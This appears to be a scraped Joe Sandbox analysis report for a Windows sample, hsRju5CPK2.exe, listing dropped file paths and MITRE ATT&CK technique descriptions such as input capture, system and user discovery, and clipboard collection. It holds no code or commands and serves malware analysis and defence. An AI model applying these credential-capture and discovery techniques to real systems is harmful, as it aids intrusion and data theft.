Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Windows Analysis Report
hsRju5CPK2.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre